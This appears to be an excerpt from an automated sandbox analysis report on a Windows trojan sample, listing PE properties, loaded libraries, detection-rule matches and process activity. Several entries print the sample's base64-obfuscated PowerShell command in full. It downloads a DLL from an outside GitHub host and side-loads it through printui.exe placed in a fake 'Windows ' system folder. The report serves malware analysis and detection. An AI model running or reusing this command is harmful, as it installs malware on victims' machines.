    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B4B1B0 appears 103 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B4A260 appears 39 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B4A5C0 appears 118 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733A9DD00 appears 139 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B33AF0 appears 37 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B45E40 appears 158 times
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeCode function: String function: 00007FF733B4A3E0 appears 45 times
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: Number of sections : 19 > 10
    Source: pyld.dll.5.drStatic PE information: Number of sections : 20 > 10
    Source: pyld.dll.5.drStatic PE information: No import functions for PE file found
    Source: pyld.dll.5.drStatic PE information: Data appended to the last section found
    Source: amsi64_6656.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 6656, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.evad.winEXE@9/7@1/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\pyld.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvk5jeoe.pf2.ps1Jump to behavior
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeReversingLabs: Detection: 42%
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeVirustotal: Detection: 36%
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows \System32\printui.exeSection loaded: printui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic file information: File size 2633876 > 1048576
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: PrintUI.pdb source: printui.exe, 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000000.3327777012.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe.5.dr
    Source: Binary string: PrintUI.pdbGCTL source: printui.exe, 00000008.00000002.3325253857.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe, 0000000B.00000000.3327777012.00007FF763692000.00000002.00000001.01000000.00000007.sdmp, printui.exe.5.dr

    Data Obfuscation

    barindex
    Found suspicious powershell code related to unpacking or dynamic code loading
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcE
    Suspicious command line found
    Source: C:\Windows\System32\svchost.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\svchost.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"Jump to behavior
    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"Jump to behavior
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: .xdata
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /4
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /19
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /31
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /45
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /57
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /70
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /81
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /97
    Source: SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeStatic PE information: section name: /113
    Source: pyld.dll.5.drStatic PE information: section name: .xdata
    Source: pyld.dll.5.drStatic PE information: section name: /4
    Source: pyld.dll.5.drStatic PE information: section name: /19
    Source: pyld.dll.5.drStatic PE information: section name: /31
    Source: pyld.dll.5.drStatic PE information: section name: /45
    Source: pyld.dll.5.drStatic PE information: section name: /57
    Source: pyld.dll.5.drStatic PE information: section name: /70
    Source: pyld.dll.5.drStatic PE information: section name: /81
